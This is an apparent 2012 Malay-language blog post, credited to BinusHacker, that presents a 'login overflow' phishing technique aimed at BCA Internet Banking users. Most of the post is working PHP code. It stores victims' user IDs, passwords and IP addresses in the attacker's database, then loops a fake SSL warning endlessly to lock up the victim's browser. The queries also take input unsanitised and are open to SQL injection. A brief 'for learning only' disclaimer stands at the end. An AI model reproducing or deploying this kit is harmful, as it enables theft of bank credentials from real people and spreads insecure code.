ads

Tuesday 5 June 2012

Phishing Attack: Login Overflow


semua dah tau pasal phising kan, phishing ni da macam ancient technique untuk hacking..hehe

so x perlu buang masa jom kite tengok phishing yang dah di upgrade oleh BinusHacker  !!




Data Flow Diagram Phishing

Ketika mangsa tersangkut dengan login phishing, web browser mangsa akan crash dan CPU Range mangsa menjadi 100%.


contoh yang ditunjukkan oleh Binus Hacker 

 
Membuat 3c.php
<?php
include “koneksi.php”;
$User = $_POST['UserId'];
$passwd = $_POST['passwd'];
$ip = getenv(REMOTE_ADDR);
$tgl = date(“j F Y, g:i a”);
$query = “INSERT INTO hack (user, passwd, ip, tgl) VALUES (‘$User’, ‘$passwd’, ‘$ip’, ‘$tgl’)”;
mysqli_query($konek, $query); // kirim query ke database
$hasil = mysqli_affected_rows($konek); // cek perubahan data di database
// login.php adalah URL Direct letak overflow
if ($hasil > 0)
{
header(‘location:../login.php’ );
}
else
{
echo “gagal”;
}
?>


Membuat koneksi.php
<?php
$database = “bca”; // nama database
$host = “localhost”; // nama host
$nama = “root”; // username database
$pass = “haning”; // password database
$konek = mysqli_connect($host, $nama, $pass, $database); // konek ke database
if(mysqli_connect_errno())
{
echo “Koneksi Ke Server Gagal.”;
exit();
}
?>

Tempat berlangsungnya overflow, saya namakan login.php
<?php
mysql_connect (“localhost”, “root”,”haning”) or die (mysql_error());
mysql_select_db (“bca”) or die(mysql_error());
$over = $_POST['login']; // button submit “login”
$sql = mysql_query(” select * from hack where user like ‘%$over%’ “);
$row = mysql_fetch_array($sql);
// Proses Oveflow, lebih tepatnya Perulangan Pencarian
if ($row > 0)
{
while ($row){
echo “At “.$row['tgl'].” Secure Socket SSL Invalid. Please, do not process access to BCA Internet Banking.<br>”;
}
}
else
{
echo “overflow gagal”;
}
?>
Tujuan phishing adalah mencuri maklumat seperti username dan password mangsa. apabila mangsa menekan login, semua data yang dimasukkan tadi akan disimpan dalam database hacker, dan browser mangsa akan crash. mangsa yang panic akan pantas untuk menutup browser mereka tanpa menyedari mereka telah diperdaya..
salah satu teknik yang bijak dari BinusHacker

 

Artikel ini adalah sekadar pembelajaran.. Adalah dilarang sama sekali untuk menyalahgunakan ilmu yang disampaikan di sini.

credit: BinusHacker



at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
Related Posts Plugin for WordPress, Blogger...